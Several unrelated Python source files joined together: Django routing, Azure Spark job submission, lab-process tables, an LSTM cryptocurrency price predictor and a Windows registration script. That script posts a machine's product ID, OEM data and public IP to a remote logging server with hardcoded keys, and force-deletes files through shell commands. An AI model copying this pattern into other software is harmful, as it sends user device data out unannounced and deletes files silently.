get_asgi_application import chat.consumers from django.urls import path from channels.auth import AuthMiddlewareStack os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings') application = ProtocolTypeRouter({ "http": get_asgi_application(), # Just HTTP for now. (We can add other protocols later.) "websocket" : AuthMiddlewareStack(URLRouter([path('ws/chat/<int:room_name>/',chat.consumers.ChatConsumer.as_asgi())])) })<reponame>meta-chen/AdslProxy #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2019/9/28 12:30 # @Author : Meta_Chen # @File : getip.py # @Software: PyCharm # @Target: 获取公网ip import requests import re class GetIP: ''' 获取本机IP ''' response = requests.get("http://txt.go.sohu.com/ip/soip") def getip(self): text = self.response.text myip = re.findall(r'\d+.\d+.\d+.\d+',text) return myip[0] def main(): getip = GetIP() print(getip.getip()) if __name__ == '__main__': main()import azure.batch.models as batch_models import yaml from azure.batch.models import BatchErrorException from aztk import error from aztk.error import AztkError from aztk.spark import models from aztk.utils import constants, helpers def __get_node(core_cluster_operations, node_id: str, cluster_id: str) -> batch_models.ComputeNode: return core_cluster_operations.batch_client.compute_node.get(cluster_id, node_id) def affinitize_task_to_master(core_cluster_operations, spark_cluster_operations, cluster_id, task): cluster = spark_cluster_operations.get(cluster_id) if cluster.master_node_id is None: raise AztkError("Master has not yet been selected. Please wait until the cluster is finished provisioning.") master_node = core_cluster_operations.batch_client.compute_node.get( pool_id=cluster_id, node_id=cluster.master_node_id) task.affinity_info = batch_models.AffinityInformation(affinity_id=master_node.affinity_id) return task def upload_serialized_task_to_storage(blob_client, cluster_id, task): return helpers.upload_text_to_container( container_name=cluster_id, application_name=task.id, file_path="task.yaml", content=yaml.dump(task), blob_client=blob_client, ) def select_scheduling_target_node(spark_cluster_operations, cluster_id, scheduling_target): # for now, limit to only targeting master cluster = spark_cluster_operations.get(cluster_id) if not cluster.master_node_id: return None return cluster.master_node_id def schedule_with_target( core_cluster_operations, spark_cluster_operations, cluster_id, scheduling_target, task, wait, internal, ): # upload "real" task definition to storage serialized_task_resource_file = upload_serialized_task_to_storage(core_cluster_operations.blob_client, cluster_id, task) # # schedule "ghost" task ghost_task = batch_models.TaskAddParameter( id=task.id, command_line="/bin/bash", ) # tell the node to run the task core_cluster_operations.batch_client.task.add(cluster_id, task=ghost_task) task_working_dir = "/mnt/aztk/startup/tasks/workitems/{}".format(task.id) task_cmd = ( r"source ~/.bashrc; " r"mkdir -p {0};" r"export PYTHONPATH=$PYTHONPATH:$AZTK_WORKING_DIR; " r"export AZ_BATCH_TASK_WORKING_DIR={0};" r"export STORAGE_LOGS_CONTAINER={1};" r"cd $AZ_BATCH_TASK_WORKING_DIR; " r'$AZTK_WORKING_DIR/.aztk-env/.venv/bin/python $AZTK_WORKING_DIR/aztk/node_scripts/scheduling/submit.py "{2}" >> {3} 2>&1'. format(task_working_dir, cluster_id, serialized_task_resource_file.blob_source, constants.SPARK_SUBMIT_LOGS_FILE)) node_id = select_scheduling_target_node(spark_cluster_operations, cluster_id, scheduling_target) node_run_output = spark_cluster_operations.node_run( cluster_id, node_id, task_cmd, timeout=120, block=wait, internal=internal) def get_cluster_scheduling_target(core_cluster_operations, cluster_id): cluster_configuration = core_cluster_operations.get_cluster_data(cluster_id).read_cluster_config() return cluster_configuration.scheduling_target def submit_application( core_cluster_operations, spark_cluster_operations, cluster_id, application, remote: bool = False, wait: bool = False, internal: bool = False, ): """ Submit a spark app """ task = spark_cluster_operations._generate_application_task(core_cluster_operations, cluster_id, application, remote) task = affinitize_task_to_master(core_cluster_operations, spark_cluster_operations, cluster_id, task) scheduling_target = get_cluster_scheduling_target(core_cluster_operations, cluster_id) if scheduling_target is not models.SchedulingTarget.Any: schedule_with_target(core_cluster_operations, spark_cluster_operations, cluster_id, scheduling_target, task, wait, internal) else: # Add task to batch job (which has the same name as cluster_id) core_cluster_operations.batch_client.task.add(job_id=cluster_id, task=task) if wait: helpers.wait_for_task_to_complete( job_id=cluster_id, task_id=task.id, batch_client=core_cluster_operations.batch_client) def submit( core_cluster_operations, spark_cluster_operations, cluster_id: str, application: models.ApplicationConfiguration, remote: bool = False, wait: bool = False, internal: bool = False, ): try: submit_application(core_cluster_operations, spark_cluster_operations, cluster_id, application, remote, wait, internal) except BatchErrorException as e: raise error.AztkError(helpers.format_batch_exception(e)) import os import time import requests import random def IsFileExist(FileName): #To check a file exist if(os.path.isfile("C:\\IDS\\SR.txt") == True): return True else: return False def UploadToServer(): #To upload data to server localtime = time.asctime( time.localtime(time.time())) #定义变量 num = 8 ran = [] ran = ''.join(str(i) for i in random.sample(range(0,9),num)) #读取文件 with open("systeminfomation.dll", "r") as f : IDD = f.read() with open("oeminfomation.dll", "r") as f: typ = f.read() if os.path.exists("C:\IDS") == False: randisk = "C:\IDS" os.mkdir(randisk) #准备上传 ip = requests.get(url="http://ip.42.pl/raw").text typee = typ[typ.rfind('data:'):] ty = typee.replace('data:', '') IDC = IDD.replace(' ', '') ID = IDC.replace('产品ID:', '') # 测试版 KEY = ("dbs1145142333") KEY = ("dbs-s11451419198102333") os.system("del /f /s /q C:\\IDS\\ID.txt") os.system("echo "+ran+" >> C:\\IDS\\ID.txt") url = "https://log.drblack-system.com/" data = {"ID":ID, "type":ty, "time":localtime, "ip":ip, "random":ran, "key-s":KEY} r = requests.post(url=url,data=data) print(r.text) os.system("del /f /s /q \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dbs_form.lnk\"") time.sleep(1.5) return 0 if(IsFileExist("C:\\IDS\\SR.txt") == True): UploadToServer() else: isavi = 0 month = 0 day = 0 birthfile = open("C:\\IDS\\SR.txt", "w") print("The reserved switch is not detected, please enter your birthday as prompted:") while(isavi == 0): month = int(input("Please enter the month:")) day = int(input("Please enter the date:")) #检测日期是否合法 if(month > 0 and month < 13): if(month == 1 or month == 3 or month == 5 or month == 7 or month == 8 or month == 10 or month == 12): if(day > 0 and day < 32): isavi = 1 else: if(month == 2): if(day > 0 and day < 30): isavi = 1 else: if(day > 0 and day < 31): isavi = 1 if(isavi == 0): print("Illegal date! Please check the input.") if(month < 10): upstr = "0" + (str(month) + "-" + str(day)) else: upstr = (str(month) + "-" + str(day)) birthfile.write(upstr) birthfile.close() UploadToServer() INITALQCFINISHEDLIB = {'Description':'All processes included in the initial qc protocol for finished libraries, except the aggregation step.', '24' : 'Customer Gel QC', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0'} INITALQC ={'Description':'All processes included in the initial qc protocol, except the aggrigation step.', '63' : 'Quant-iT QC (DNA) 4.0', '65' : 'Quant-iT QC (RNA) 4.0', '66' : 'Qubit QC (DNA) 4.0', '68' : 'Qubit QC (RNA) 4.0', '24' : 'Customer Gel QC', '20' : 'CaliperGX QC (DNA)', '16' : 'Bioanalyzer QC (DNA) 4.0', '18' : 'Bioanalyzer QC (RNA) 4.0', '116' : 'CaliperGX QC (RNA)', '504' : 'Volume Measurement QC'} AGRINITQC = {'Description':'Aggregation step of the initial qc protocol', '7' : 'Aggregate QC (DNA) 4.0', '9' : 'Aggregate QC (RNA) 4.0'} PREPREPSTART = {'Description':'Process/processes that can be defined as a start of the library preparation protocol. If the work flow involves two library preparation protocols, such as for exome captue, only the steps of the first protocol should be given here.', '304' : "Ligate 3' adapters (TruSeq small RNA) 1.0"} POOLING = {'Description':'To identify the reagent labels (indexes) of each sample. If multiple pooling steps, the first pooling step after indexing should be specified', '42': "Library Pooling (Illumina SBS) 4.0", '43': "Library Pooling (MiSeq) 4.0", '44': "Library Pooling (TruSeq Amplicon) 4.0", '45': "Library Pooling (TruSeq Exome) 4.0", '58': "Pooling For Multiplexed Sequencing (SS XT) 4.0", '255': "Library Pooling (Finished Libraries) 4.0", '308': "Library Pooling (TruSeq Small RNA) 1.0", '404': "Pre-Pooling (Illumina SBS) 4.0", '506': "Pre-Pooling (MiSeq) 4.0", '508': "Applications Pre-Pooling", '716': 'Library Pooling (HiSeq X) 1.0'} PREPSTART = {'Description':'Process/processes that can be defined as a start of the library preparation protocol. The first one of these that are run in lims is used to set the prep start date. If the work flow involves two library preparation protocols, such as for exome capture, the prep start step of the second protocol should be given here. ', '10' : 'Aliquot Libraries for Hybridization (SS XT)', '47' : 'mRNA Purification, Fragmentation & cDNA synthesis (TruSeq RNA) 4.0', '33' : 'Fragment DNA (TruSeq DNA) 4.0', '407' : 'Fragment DNA (ThruPlex)', '308': 'Library Pooling (TruSeq Small RNA) 1.0', '117' : 'Applications Generic Process', '454' : 'ThruPlex template preparation and synthesis', '405' : 'RiboZero depletion'} PREPEND = {'Description':'Process that can be defined as a end of the library preparation. If more than one library preparation protocol is included in the work flow, only the prep end step of the second protocol should be given here. Used to set the prep finished date.', '157': 'Applications Finish Prep', '109' : 'CA Purification', '456' : 'Purification (ThruPlex)', '111' : 'Amplify Captured Libraries to Add Index Tags (SS XT) 4.0', '406' : 'End repair, size selection, A-tailing and adapter ligation (TruSeq PCR-free DNA) 4.0', '311': 'Sample Placement (Size Selection)'} LIBVAL = {'Description':'All processes included in the library validation protocol, except the aggregation step. If the work flow involves two library preparation protocols, such as for exome capture, only the steps of the second protocol should be given here.', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0'} LIBVALFINISHEDLIB = {'Description':'', '62' : 'qPCR QC (Library Validation) 4.0', '64' : 'Quant-iT QC (Library Validation) 4.0', '67' : 'Qubit QC (Library Validation) 4.0', '20' : 'CaliperGX QC (DNA)', '17' : 'Bioanalyzer QC (Library Validation) 4.0', '24' : 'Customer Gel QC'} AGRLIBVAL = {'Description':'The aggregation step of the library validation protocol', '8': 'Aggregate QC (Library Validation) 4.0'} SEQSTART = {'Description':'These processes are used to set the sequencing_start_date', '23':'Cluster Generation (Illumina SBS) 4.0', '26':'Denature, Dilute and Load Sample (MiSeq) 4.0', '710':'Cluster Generation (HiSeq X) 1.0'} DILSTART = {'Description':'These processes are used to set the dilution_and_pooling_start_date', '40' : 'Library Normalization (MiSeq) 4.0', '39' : 'Library Normalization (Illumina SBS) 4.0', '715': 'Library Normalization (HiSeq X) 1.0'} SEQUENCING = {'Description':'Sequencing', '38' : 'Illumina Sequencing (Illumina SBS) 4.0', '46' : 'MiSeq Run (MiSeq) 4.0', '714': 'Illumina Sequencing (HiSeq X) 1.0'} WORKSET = {'Description':'To identify the work sets on which the samples has been run. The process used to define a workset for the protocol. ', '204' : 'Setup Workset/Plate'} SUMMARY = {'Description':'', '356' : 'Project Summary 1.3'} DEMULTIPLEX={'Description':'', '13' : 'Bcl Conversion & Demultiplexing (Illumina SBS) 4.0'} CALIPER = {'Description':'', '20' : 'CaliperGX QC (DNA)', '116' : 'CaliperGX QC (RNA)'} FINLIB = ['Finished library', 'Amplicon'] PROJ_UDF_EXCEPTIONS = ['customer_reference','uppnex_id','reference_genome','application'] SAMP_UDF_EXCEPTIONS = ['customer_name','reads_requested_(millions)','min_reads', 'm_reads','dup_rm','status_auto','status_manual','average_size_bp','incoming_qc_status'] PROCESSCATEGORIES = {'INITALQCFINISHEDLIB' : INITALQCFINISHEDLIB, 'INITALQC':INITALQC, 'AGRINITQC':AGRINITQC, 'PREPREPSTART':PREPREPSTART, 'POOLING':POOLING, 'PREPSTART':PREPSTART, 'PREPEND':PREPEND, 'LIBVAL':LIBVAL, 'LIBVALFINISHEDLIB':LIBVALFINISHEDLIB, 'AGRLIBVAL':AGRLIBVAL, 'SEQSTART':SEQSTART, 'DILSTART':DILSTART, 'SEQUENCING':SEQUENCING, 'WORKSET':WORKSET, 'SUMMARY':SUMMARY, 'DEMULTIPLEX':DEMULTIPLEX, 'CALIPER':CALIPER} <reponame>block1o1/CryptoPredicted<gh_stars>1-10 # Artificial Intelligence (A.I.) price predictions # this script uses tensorflow/Keras libraries, make sure they are installed properly. import matplotlib matplotlib.use('Agg') import os, errno os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # disable tensorflow error about CPU instructions import time import math import numpy as np import traceback from numpy import concatenate import matplotlib.pyplot as plt import threading import random import json import requests import pprint from collections import OrderedDict from datetime import datetime, timedelta import multiprocessing import multiprocessing.pool # mode mode = "production" # mode = "test" import sys sys.path.insert(0, '/home/cryptopredicted/') sys.path.insert(0, '/home/cryptopredicted/presenters/') from mysettings import dtNow, createLogger import DAL h5Dir = '/home/cryptopredicted/predictors/h5/' imgDir = '/home/cryptopredicted/ui/prediction/images/' def dtToString(dt): return datetime.strftime(dt, '%Y-%m-%dT%H:%M') def create_train_dataset(dataset, look_back, n_features, seq_pred_len): # make sequences from 0 to len(dataset)-lookback sample, feature = [], [] #print(len(dataset)) #print(look_back) for i in range(0, len(dataset)-look_back-seq_pred_len): tmp = [] for n in range(0, n_features): tmp.append( dataset[i:i+look_back, n] ) sample.append(tmp) feature.append([ dataset[i+look_back:i+look_back+seq_pred_len, :n_features] ]) # new array will be len(dataset)-1 (one size smaller) return np.array(sample), np.array(feature) def create_test_dataset(dataset,look_back, n_features): # make sequences but make sure the end is included sample = [] for i in range(0, len(dataset)-look_back+1): # +1 important! to make this function work when n_window=1 tmp = [] for n in range(n_features): tmp.append( dataset[i:i+look_back, n] ) sample.append(tmp) return np.array(sample) class MyMinMaxScaler(): def __init__(self, _min, _max): self.min = _min self.max = _max def fit_transform(self, values): for x in range(len(values)): values[x] = (values[x] - self.min) / (self.max - self.min) return values def inverse_transform(self, values): for x in range(len(values)): values[x] = values[x] * (self.max - self.min) + self.min return values # try different scalers # http://scikit-learn.org/stable/modules/classes.html#module-sklearn.preprocessing def prepare_trainingset(dataset, n_features, n_window, seq_pred_len): from sklearn.preprocessing import MinMaxScaler, StandardScaler values = np.array(dataset) # make a copy #print(values) values = values.astype('float32') scalers = [] for i in range(n_features): scalers.append( MinMaxScaler(feature_range=(0, 1)) ) # scalers.append( StandardScaler() ) # scalers.append(MyMinMaxScaler(0, 20000)) values[:,i] = scalers[i].fit_transform(values[:,i].reshape(-1,1))[:,0] # ########################################## #exit() #print("split into input and outputs") train = np.array(values) print(train.shape) train_X, train_y = create_train_dataset(train, n_window, n_features, seq_pred_len) print(train_X.shape, train_y.shape) train_X = train_X.reshape((train_X.shape[0], n_features, n_window)) train_y = train_y.reshape(train_y.shape[0],n_features, 1*seq_pred_len) # the target data is a single array (:1) of n_features #print(train_X.shape, train_y.shape) #print() if train_X.shape[0] == 0: print(" => not enough historical data yet. aborted." ) raise return (train, train_X, train_y, scalers) def make_train_predictions(scalers, train_X, n_features, n_window, model, seq_pred_len): # predict training data: price xpolated = [()] * len(scalers) p_train = model.predict(train_X) p_train = p_train.reshape((p_train.shape[0], 1*seq_pred_len, n_features)) future_pinv = np.array(p_train) for i in range(len(scalers)): dump = scalers[i].inverse_transform(p_train[:,:,i])[:,:] future_pinv[:,:,i] = dump return future_pinv def make_future_predictions(scalers, train, n_window, n_features, predict_n_intervals, model, seq_pred_len): # !ici ######################################### # here we predict future values (predictions) # notice that we create multiple predictions by using the latest prediction as new input data (shifting the input values) xpolated = [()] * len(scalers) future = np.array(train[-n_window:, :n_features]) # get a portion of historic data (size of window, because everything before is already predicted) for z in range( int(predict_n_intervals/seq_pred_len) ): # we don't need every sequence, we let it predict all sequences; each iteration we keep only the latest one. future_p = create_test_dataset(future, n_window, n_features) # print("it: "+str(z)) #print(" input: " + str(future_p.shape)) # print() future_p = model.predict(future_p) future_p = future_p.reshape((future_p.shape[0], 1*seq_pred_len, n_features)) # 2D to 3D #print("output: " + str(future_p.shape)) # print() future_pinv = np.array(future_p) # make deep copy for i in range(len(scalers)): dump = scalers[i].inverse_transform( np.array(future_p[:,:,i]) )[:,:] future_pinv[:,:,i] = dump if len(xpolated[i]) == 0: xpolated[i] = future_pinv[:,:,i].reshape(1*seq_pred_len) # -1 -1 else: xpolated[i] = concatenate([ xpolated[i], future_pinv[:,:,i].reshape(1*seq_pred_len) ]) #print("output': \n", str(future_pinv)) #print() xy_p = np.array(future_p[-1*seq_pred_len:,:,:]) # get most recent prediction xy_p = xy_p.reshape(1*seq_pred_len, n_features) future = np.array(future[1*seq_pred_len:, :n_features]) # remove oldest rows future = np.append(future, xy_p, axis=0) #print("---------------") # ! == feedback loop ! ######################################### return xpolated def silentremove(filename): try: os.remove(filename) except OSError as e: # this would be "except OSError, e:" before Python 2.6 if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory raise # re-raise exception if a different error occurred def f_historymins(interval, n_window, multiplier): return interval*(n_window+1)*multiplier def obtainDataset(exchange ,symbol, interval, historymins, currentDateTime, dataset_func, sync_dict_json): # get data from our API and process it given our dataset_func jsout = getJson(exchange, symbol['base_cur'], symbol['quote_cur'], interval, historymins, currentDateTime, sync_dict_json) try: dataset = dataset_func(jsout, symbol) except KeyboardInterrupt: raise except: jsout = getJson(exchange, symbol['base_cur'], symbol['quote_cur'], interval, historymins, currentDateTime, sync_dict_json) dataset = dataset_func(jsout, symbol) ####### ####### removing rows where price is zero for row,_ in enumerate(dataset): if dataset[row][0] == 0: # zero price detected for col,_ in enumerate(dataset[row]): dataset[row][col] = 0 # set every column to zero because price is zero dataset = dataset[(dataset > 0).any(axis=1)] # delete entire row if all '0' value present ####### return dataset def fitAndPredict_trainAlways(h5fn, featuresID, exchange, symbol, n_window, interval, currentDateTime, predict_n_intervals, n_neuron, n_hiddenlay, n_epoch, n_batch_size, dataset_func, sync_dict_json, sync_list_output, seq_pred_len): # this is the core A.I. training and predictions part. import random from keras import backend as K from keras.callbacks import EarlyStopping try: # if no model exists: prepare data, create model, train it, save it and clear it. if not modelExists(h5fn): historymins = f_historymins(interval, n_window, 70) # 1000 dataset = obtainDataset(exchange ,symbol, interval, historymins, currentDateTime - timedelta(minutes=interval-1), dataset_func, sync_dict_json) n_features = len(dataset[0]) (train, train_X, train_y, scalers) = prepare_trainingset(dataset, n_features, n_window, seq_pred_len) print("creating new model: " + h5fn) model = createModel(h5fn, n_neuron, n_hiddenlay, n_features, n_window, seq_pred_len) early_stopping_monitor = EarlyStopping(monitor='loss', patience=30, verbose=1) history = model.fit(train_X, train_y, epochs=n_epoch, batch_size=n_batch_size, verbose=1, shuffle=False, callbacks=[early_stopping_monitor]) # validation_data=(test_X, test_y), saveModel(h5fn, model) saveWeights(h5fn, model) # saving scaler -- https://stackoverflow.com/questions/41993565/save-scaler-model-in-sklearn K.clear_session() del model # by now a model (already) exists; so we prepare data, load model, train it, make predictions and save the new weights. # notice that it's also possible to train the model once (step above), and then omit the "model.fit(...)" function, whereby we don't re-train the model each new generation. # if you omit continuous training, you will increase performance, but whether you accuracy is retained (through time) is not documented. # let us train once, and then just load model historymins = f_historymins(interval, n_window, 3) dataset = obtainDataset(exchange ,symbol, interval, historymins, currentDateTime, dataset_func, sync_dict_json) n_features = len(dataset[0]) (train, train_X, train_y, scalers) = prepare_trainingset(dataset, n_features, n_window, seq_pred_len) model = loadModelAndWeights(h5fn) early_stopping_monitor = EarlyStopping(monitor='loss', patience=20, verbose=1) history = model.fit(train_X, train_y, epochs=n_epoch, batch_size=n_batch_size, verbose=1, shuffle=False, callbacks=[early_stopping_monitor]) # validation_data=(test_X, test_y), saveWeights(h5fn, model) xpolated = make_future_predictions(scalers, train, n_window, n_features, predict_n_intervals, model, seq_pred_len) # let's prepare data to be stored into the database: currentDateTime = adjustDatetime(interval, currentDateTime)# we use real-time datetime to make predictions, but when we persist we'll floor the datetime according to the interval tmpdt = currentDateTime + timedelta(minutes=interval) maxdt = currentDateTime + timedelta(minutes=seq_pred_len*predict_n_intervals*interval) j = 0 sendobj = { 'data': [], 'base_cur':symbol['base_cur'], 'quote_cur':symbol['quote_cur'], 'interval':interval, 'timestamp':currentDateTime, 'exchange':exchange, 'n_fid':featuresID, 'n_batch_size':n_batch_size, 'n_neuron':n_neuron, 'n_window':n_window, 'n_epoch':n_epoch, 'n_predict_intervals':predict_n_intervals, 'n_hiddenlay':n_hiddenlay, 'mode': mode} while (tmpdt <= maxdt and j < len(xpolated[0])): sendobj['data'].append( { 'timestamp': tmpdt, 'open': float(xpolated[0][j]), 'close': float(xpolated[1][j]), 'low': float(xpolated[2][j]), 'high': float(xpolated[3][j]), 'volume': float(xpolated[4][j]), # 'signal': float(xpolated[5][j]), } ) tmpdt += timedelta(minutes=interval) j += 1 K.clear_session() del model # instead of writing each prediction individually, we use another shared dict variable, which we process at the very end. # this was implemented for several reasons (we want all predictions to be updated/stored at the same time, and not with a minute delay). # DAL.store_predictions_v1(DAL.openConnection(), sendobj) sync_list_output.append(sendobj) print(currentDateTime) except KeyboardInterrupt: raise except Exception as ex: traceback.print_exc() logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical(str(ex), exc_info=True) def getJson(exchange, base_cur, quote_cur, interval, historymins, currentDateTime, sync_dict_json): # getting data from our API (OHLC, volume, sentiments, ...) depending on the type parameter in query. # url = 'https://cryptopredicted.com/api.php?type=exchangeChart&exchange='+exchange+'&base_cur='+base_cur+'"e_cur='+quote_cur+'&historymins='+str(historymins)+'¤tDateTime='+dtToString(currentDateTime)+'&interval='+str(interval) url = 'https://cryptopredicted.com/PWA/api/?type=exchange&exchange='+exchange+'&base_cur='+base_cur+'"e_cur='+quote_cur+'&interval='+str(interval)+'&historymins='+str(historymins)+'¤tDateTime=' + dtToString(currentDateTime) log = createLogger("predictions_v1_info", "predictions_v1_info") log.info(url) i = 0 force = False while url in sync_dict_json and sync_dict_json[url] == 0: time.sleep(0.25) i += 1 if i*4 > 60: # wait 60seconds for the json (from other process), if it fails then force proceed yourself force = True # sync_dict_json is a dictionary shared among the other processes # it prevents making the same calls to the API, if the results are already obtained by some other process # we don't want to make unnecessary API calls, one is enough given the same parameters. if force or not url in sync_dict_json: print(url) sync_dict_json[url] = 0 #print(url) response = requests.get(url) js = json.loads(response.text , object_pairs_hook=OrderedDict) sync_dict_json[url] = js #return js return sync_dict_json[url] def moving_average(a, n=3) : ret = np.cumsum(a, dtype=float) ret[n:] = ret[n:] - ret[:-n] return ret[n - 1:] / n def func_ai_a(js, symbol): # preparing data to be trained, servers as input to the Neural Net (NN) dataset = [] #[()] * len(js) i=0 for key in js: # DO NOT USE RELATIVE VALUES FROM API !!! only absolute ones if 'open' in js[key] and 'close' in js[key] and 'low' in js[key] and 'high' in js[key] and 'volume' in js[key]: dataset.append([ js[key]['open'], js[key]['close'], js[key]['low'], js[key]['high'], js[key]['volume'], ]) i += 1 else: # most likely some missing interval print("missing data at interval:") print(key) #print(js[key]) logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical("missing data at interval:") logErr.critical(key) #logErr.critical(js[key]) # raise dataset= np.array(dataset) return dataset def func_ai_b(js, symbol): # another type of input format, whereby we also make it predict buy/sell positions. # this is highly experimental and yielded bad results # but it may illustrate how such a thing is done in caee you need to extend your own version. dataset = [] #[()] * len(js) i=0 for key in js: # DO NOT USE RELATIVE VALUES FROM API !!! only absolute ones if 'open' in js[key] and 'close' in js[key] and 'low' in js[key] and 'high' in js[key] and 'volume' in js[key]: dataset.append([ js[key]['open'], js[key]['close'], js[key]['low'], js[key]['high'], js[key]['volume'], ]) i += 1 else: # most likely some missing interval print("missing data at interval:") print(key) #print(js[key]) logErr = createLogger("predictions_v1_error", "predictions_v1_error") logErr.critical("missing data at interval:") logErr.critical(key) #logErr.critical(js[key]) # raise # in this L = len(dataset) Lentry = len(dataset[0]) for i, x in enumerate(dataset): #print(i) price = (x[0]+x[1])/2 # avg(open ; close) j = i+1 jarr = [] while j < L and j < 20: futurePrice = (dataset[j][0]+dataset[j][1])/2 if futurePrice >= price * 1.005: # if price in near future increases by 0.5% jarr.append(j) # if we can make a profit by buying 'now' and selling at some interval 'j', then record this j += 1 if len(x) == Lentry: # if we haven't added the signal yet if len(jarr) >= 1: # if we have at least X intervals in the future where we can sell (are we looking for a new plateau or temporary spike?) x.append(1) # buy for j in jarr: if len(dataset[j]) == Lentry: dataset[j].append(2) # sell for j in range(i+1, max(jarr)): if len(dataset[j]) == Lentry: dataset[j].append(0) # hold -- fill all gaps between first buy and possible future sells else: x.append(0) # hold # pprint.pprint(dataset[i:20]) # exit() dataset= np.array(dataset) return dataset def makeDatasets(): datasets = {} datasets['func_ai_a']= func_ai_a return datasets def modelExists(h5fn): return os.path.isfile(h5fn+'.h5') def loadModelAndWeights(h5fn): from keras.models import load_model model = load_model(h5fn+'.h5', compile=True) model.load_weights(h5fn+' weights.h5') return model def saveModel(h5fn, model): model.save(h5fn+'.h5') def saveWeights(h5fn, model): model.save_weights(h5fn+' weights.h5') def createModel(h5fn, n_neuron, n_hiddenlay, n_features, n_window, seq_pred_len): # call this function only in a new process, not in separate threads !!! from keras.models import Sequential from keras.layers.core import Dense, Activation, Dropout, Flatten from keras.layers.normalization import BatchNormalization from keras.layers import Dense, LSTM, Masking model = Sequential() #model.add(Masking(mask_value=0, input_shape=(n_features, n_window) )) # this could messup our signals '0-1-2' , since 0 means hold # model.add(LSTM(n_neuron, return_sequences=True, )) # for i in range(n_hiddenlay): # model.add(LSTM(n_neuron, return_sequences=True, )) if n_hiddenlay == 2: model.add(LSTM(5, return_sequences=True, input_shape=(n_features, n_window))) model.add(Dropout(0.3)) model.add(LSTM(3, return_sequences=True, )) model.add(Dropout(0.2)) model.add(LSTM(3, return_sequences=True, )) model.add(Dropout(0.2)) model.add(LSTM(5, return_sequences=True, )) model.add(Dropout(0.2)) if n_hiddenlay == 1: # default: recommended single layer with multiple neurons model.add(LSTM(5, return_sequences=True, input_shape=(n_features, n_window))) model.add(Dropout(0.2)) model.add(Dense(1*seq_pred_len)) # number of outputs model.add(Activation("linear")) model.compile(loss='mae', optimizer='adam') #accuracy not relevant for regression of timeseries #print(h5fn) return model def adjustDatetime(interval, currentDateTime): # if the datetime is not rounded to the given interval parameter, we'll do it here. if interval <= 60: return currentDateTime.replace(minute=currentDateTime.minute-(currentDateTime.minute % interval), second=0, microsecond=0) #"2018-01-26T12:00" else: return currentDateTime.replace(hour=currentDateTime.hour-(currentDateTime.hour % int(interval/60)), minute=currentDateTime.minute-(currentDateTime.minute % 60), second=0, microsecond=0) #"2018-01-26T12:00" def adjustDatetime_realtime(interval, currentDateTime): return currentDateTime def train_predict(args = sys.argv): # we need to generate every possible combination of our configuration, let's pre-process it. # we basically create and store tuples in an array. # the array will be processed in a multi-processing fashion. # we don't want to parallellize every possible combination, # but instead we want to have max 6 to 9 processes running at the same time. # that's why at the deepest level we have a "uid" which acts as separator. # this is an important part, because if you have many different combinations you want to try out (e.g. different epochs and neuron counts), # then you want to make sure the processes don't take too long or make the server crash due to too many processes (or memory consumption). for HH in range(HH_max): for exchange in sorted(exchanges): for symbol in sorted(symbols, key=lambda x: x['base_cur']): for featuresID, dataset_func in datasets.items(): for n_window in n_windows: for interval in intervals: for n_epoch in n_epochs: for n_neuron in n_neurons: for n_hiddenlay in n_hiddenlayers: for n_batch_size in n_batch_sizes: for predict_n_intervals in predict_n_intervals_arr: h5fn = h5Dir + 'predictions_v1' + ' base_cur='+symbol['base_cur']+ ' base_cur='+symbol['quote_cur'] + ' fid='+featuresID + ' interval='+str(interval) + ' n_window='+str(n_window) + ' n_epoch='+str(n_epoch) + ' n_batch_size='+str(n_batch_size) + ' n_neuron='+str(n_neuron) + ' predict_n_intervals='+str(predict_n_intervals) + ' n_hiddenlay='+str(n_hiddenlay) _dtime = adjustDatetime_realtime(interval, dtstart + timedelta(minutes=HH*interval) ) uid = symbol['base_cur']#+"_"+symbol['quote_cur']+"_"+str(n_neuron)+"_"+str(n_window) # way to parallellize processing if not uid in arrParams: arrParams[uid] = [] arrParams[uid].append( (h5fn, featuresID, exchange, symbol, n_window, interval, _dtime, predict_n_intervals, n_neuron, n_hiddenlay, n_epoch, n_batch_size, dataset_func, sync_dict_json, sync_list_output, seq_pred_len) ) # now that we have our magical array of jobs/tasks, # let's create a processing pool and execute all jobs accordingly. tasks = {} pools = {} for idf, arr in arrParams.items(): tasks[idf] = []; if not idf in pools: pools[idf] = multiprocessing.Pool( 1 ) for tup in arr: tasks[idf].append( pools[idf].apply_async(fitAndPredict_trainAlways, tup) ) client = DAL.openConnection() DAL.liveness_IAmAlive(client, "producer: predictions") for idf, arr in tasks.items(): for task in arr: try: task.get(timeout=60*20) except KeyboardInterrupt: raise except: traceback.print_exc() pools[idf].close() for sendobj in sync_list_output: DAL.store_predictions_v1(client, sendobj) print("/performance/") print("started:") print(_dtnow) print("ended:") print(dtNow()) print("/exited/") print("") log = createLogger("predictions_v1_info", "predictions_v1_info") log.info("/performance/") log.info("started:") log.info(str(_dtnow)) log.info("ended:") log.info(str(dtNow())) log.info("/exited/") log.info("") if __name__ == '__main__': args = sys.argv # we need to know the interval (10 minutes or 60 minutes): {10,60} if len(args) < 2: print("missing interval param") exit() # parameters: exchanges = ['binance'] # crypto currencies: (as defined by the exchange, and accessible through our API) symbols = [ {'base_cur':'BTC', 'quote_cur':'USDT'}, {'base_cur':'ETH', 'quote_cur':'USDT'}, {'base_cur':'LTC', 'quote_cur':'USDT'}, {'base_cur':'BCC', 'quote_cur':'USDT'}, # bitcoin cash (bcc ~ bch) {'base_cur':'NEO', 'quote_cur':'USDT'}, ] # testing seq_pred_len = 1 predict_n_intervals_arr = [12] n_windows = [32] n_neurons= [2] n_hiddenlayers = [1] n_epochs= [1000] intervals = [ int(args[1]), ] n_batch_sizes = [512,] datasets = makeDatasets() _dtnow = dtNow() pmanager = multiprocessing.Manager() sync_dict_json = pmanager.dict() 